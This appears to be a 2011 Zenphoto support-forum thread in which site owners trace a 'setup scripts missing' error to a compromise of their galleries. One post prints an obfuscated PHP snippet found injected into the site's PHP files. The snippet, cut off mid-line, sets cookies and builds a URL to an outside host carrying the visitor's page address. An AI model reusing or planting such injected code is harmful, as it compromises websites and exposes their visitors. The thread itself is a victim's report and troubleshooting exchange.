Hi,

My Zen Installation has been working fine and then out of the blue when I went to view it today I got this.

"setup scripts missing"

It happens both with I try to access the Admin and the Live Gallery.

http://spoilertv.co.uk/images/zp-core/admin.php
http://spoilertv.co.uk/images/

As far as I know we've made no changes for a couple of weeks.

Any pointers/help would be great/

You probably upgraded or something. Just re-upload the files complained about and let setup re-run.

That's the thing. It was working fine when I went to bed last night and we've not made any changes. When I got up this morning the error occured.

How do I see which files are missing?

This is what I see in the log.

I've no idea what any of this means

According to my investigation the index.php file has been modified a few hours later:
-rw-r--r-- 1 spoilert spoilert 7859 Nov 9 00:41 /home/spoilert/public_html/images/index.php
And the following is displayed in the error_log:
[09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729
[09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729

That's the thing. It was working fine when I went to bed last night and we've not made any changes. When I got up this morning the error occured.

How do I see which files are missing?

This is what I see in the log.

I've no idea what any of this means

According to my investigation the index.php file has been modified a few hours later:
-rw-r--r-- 1 spoilert spoilert 7859 Nov 9 00:41 /home/spoilert/public_html/images/index.php
And the following is displayed in the error_log:
[09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729
[09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729

That's the thing. It was working fine when I went to bed last night and we've not made any changes. When I got up this morning the error occured.

How do I see which files are missing?

I'm seeing this in my error log

http://pastebin.com/XTdb6aBc

I don't know what any of that means

I just came here to ask about this also. My site was working fine and I have made no changes before this happened. Just visited the site today to be confronted by the "setup scripts missing" message.

In my error log I see:

Cannot modify header information - headers already sent by (output started at /home/**/index.php:1) in /home/***/zp-core/functions.php on line 1729

I can't view or login to the site.

Any ideas before I re-upload?

Thanks.

We had this topic several times recently, please try the search, too.

So again: After every install or upgrade you are requested to delete the setup files, /zp-core/setup.php and /zp-core/setup (folder) for security reasons. With 1.4.2 it will even do this automatically. This is what you probably did. Setup always runs automacitally if the version changes. That happes for example if you upgrade (from nightly builds for example) or remove the htaccess file.

As said reupload the files and let setup run.

Addition: If you think your root index.php file has been modified and should not make sure your site/Server has not been hacked. We have currently a topic about that: http://www.zenphoto.org/support/topic.php?id=9939#post-58237

Acrylian,

You're missing the point.

This was an Install that had not been changed for several weeks.

Literally overnight this problem occurred.

I've had to re-install Zen to get it to work this morning.

What I am worried about is why this happened with NO Modifications on my part whilst I was actually asleep.

Does Zen Autoupdate itself with no user interaction?

Looking at my index, album and image php files I see this code added to the top of each file.

--

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo ""; echo "

No, Zenphoto does not and can't auto update.

The code you posted proofs that apparently your site has been hacked. This might not have been Zenphoto fault, but a permissions issue. Best contact your host as well

However as the thread I linked above tell there was a security issue with the 3rd party file manager in 1.4.1.4 and older. Maybe they exploited that or not.

So I urge you to upgrade your site.

Thanks, I missed your update.

Looks like it must have been hacked.

I'm now on 1.4.1.5. Is that one secure?

As far as we know it is secure. But of course there is sadly never a 100% guarantee until someone proofs otherwise.

Please contact your host as well as it might not have been Zenphoto's fault at all.

Looking at the hack, all the php files in the zen folder had been hacked.

Do you have any idea what that code above does/did?

I'm now worried about using zen again after this

Well, as said it must not have been Zenphoto's fault. For example our Zenphoto install on our site had not been hacked. Best contact your host, maybe he knows more.

There are several possibilities Zenphoto cannot do anything about for example:

• The file/folder permissions were not correct (what setting did you have?)
• The server itself has been hacked

Also your browser or computer system could have been infected and someone got the ftp password that way.

We've check the server and only the Zen folder had the code added to every php file.

All other php outside of zen are find.

Also I checked with the hosts and no Admin access with FTP or other was done since my last authorized upload yesterday. The files seem to have been updated via some SQL Injection (whatever that is).

Looks like something in zen 1.4.1.4 and below was insecure and hackers found a way in

Well, if someone got access to the files it might have been a permissions issue as well. It might have been the file manager issue but we currently don't know.
Did you look at the zp-data folder? If permissions are not correct on that the config file might have been hacked (note setup tries to set the permissions but cannot do so always depending on server config.)

Which version was the original one on that site? Was that 1.4.1.4 or older?

1.4.1.4 was on the server.

I've upgraded now to 1.4.1.5

Permissions were all set correctly. It was a standard vanilla install.

Looking at the code that was injected into all php files it seems related to a bot attack via the tinymce

I see the same code and in the same places that darkufo sees.

I'm careful with my sites and have not experienced something like this before.

I don't know if the theme has anything to do with it but I'm using zpgallerific_v1.4.1.

Sorry you also got hacked.

I re-installed the whole of Zenphoto to remove the hacked code.

Do you have other services on your server? You might want to check the php files of those services to see if they were hacked as well

Is it safe to delete the tinymce folder?